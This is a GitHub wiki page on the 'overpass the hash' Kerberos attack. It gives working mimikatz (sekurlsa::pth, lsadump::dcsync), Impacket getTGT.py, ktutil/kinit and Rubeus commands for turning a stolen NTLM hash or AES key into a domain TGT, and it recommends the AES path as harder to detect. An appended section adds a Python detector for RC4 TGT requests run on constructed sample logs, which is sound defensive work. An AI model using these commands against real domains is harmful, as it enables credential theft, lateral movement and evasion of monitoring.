Overpass the hash - CraigDonkin/Infrastructure GitHub Wiki
Overpass the hash leverages a captured NTLM hash to obtain a Kerberos TGT for the user. You don't need to be elevated to request the ticket if you have the hash. The ticket is then leveraged via a pass-the-ticket attack.
```
privilege::debug
sekurlsa::pth /user:Username /domain:domain /ntlm:hash
```
- The hash is injected into the msv1_0 and kerberos security providers so that they answer the NTLM challenges and obtain a TGT.
- The NTLM hash is passed into Kerberos using RC4 encryption: Microsoft allows RC4-HMAC-MD5 encrypted Kerberos tickets to be created from the NTLM hash.
An AES key can be used instead if necessary:
- First get the AES key.
- Then use it for pass the hash.
- This will be more difficult to detect.
```
lsadump::dcsync /user:user /domain:domain
sekurlsa::pth /user:username /domain:domain /ntlm:hash /aes256:aeskey
```
Using getTGT.py with the NTLM hash:
```
./getTGT.py -hashes hash host
chmod 600 tgwynn.cache
```
With the AES key:
```
./getTGT.py -aeskey key host
```
Using ktutil and kinit (the encryption type is `arcfour-hmac-md5`):
```
ktutil -k mykeys add -p user@domain -e arcfour-hmac-md5 -w hash --hex -V 5
kinit -t mykeys user@domain
klist
```
Using Rubeus:
```
Rubeus.exe asktgt /user:<username> /ntlm:<ntlm hash> /nowrap
```
If you want a TGT encrypted with AES256:
```
Rubeus.exe asktgt /user:<username> /aes256:<aes256 hash> /nowrap
```
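The detection point the AES section hints at, as an added example that is not part of this wiki: an NTLM-hash-based overpass the hash yields a TGT request (Windows Security event 4768) with RC4-HMAC ticket encryption (etype 0x17), which stands out in a domain where accounts normally get AES tickets. The log lines below are constructed samples in a simplified key=value layout, and the field names follow the 4768 event schema.

```python
# Added detection example (not from the wiki page): flag successful Kerberos
# TGT requests (Security event 4768) whose TicketEncryptionType is RC4-HMAC
# (0x17), the downgrade produced when the TGT is requested with an NTLM hash.
# The log below is a constructed sample, not real telemetry.
import re

# Kerberos encryption-type codes as they appear in the TicketEncryptionType field.
ETYPE_NAMES = {"0x17": "RC4-HMAC", "0x12": "AES256-CTS-HMAC-SHA1-96",
               "0x11": "AES128-CTS-HMAC-SHA1-96"}

SAMPLE_LOG = """\
EventID=4768 TargetUserName=alice TicketEncryptionType=0x12 IpAddress=10.0.0.21 Status=0x0
EventID=4768 TargetUserName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.77 Status=0x0
EventID=4768 TargetUserName=bob TicketEncryptionType=0xFFFFFFFF IpAddress=10.0.0.77 Status=0x6
EventID=4768 TargetUserName=carol TicketEncryptionType=0x12 IpAddress=10.0.0.33 Status=0x0
EventID=4769 TargetUserName=alice TicketEncryptionType=0x17 IpAddress=10.0.0.21 Status=0x0
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse_events(text):
    """Turn each key=value line into a dict, skipping blank lines."""
    return [dict(FIELD_RE.findall(line)) for line in text.splitlines() if line.strip()]

def rc4_tgt_requests(events):
    """Return successful 4768 (TGT) requests that used RC4 (etype 0x17).

    Failed requests (Status != 0x0) are skipped because no ticket was issued,
    and 4769 service-ticket requests are ignored: RC4 there usually reflects
    the service account's keys rather than the requester's credential.
    """
    hits = []
    for ev in events:
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("TicketEncryptionType") == "0x17":
            hits.append({"user": ev["TargetUserName"], "source": ev["IpAddress"],
                         "etype": ETYPE_NAMES["0x17"]})
    return hits

if __name__ == "__main__":
    for hit in rc4_tgt_requests(parse_events(SAMPLE_LOG)):
        print(f"RC4 TGT issued to {hit['user']} from {hit['source']} ({hit['etype']})")
```

The AES variant (etype 0x12) looks like any other TGT request to this rule, which is exactly why the page calls it harder to detect; on the source host, the `sekurlsa::pth` step still produces a 4624 logon with logon type 9 (NewCredentials), which is the complementary check.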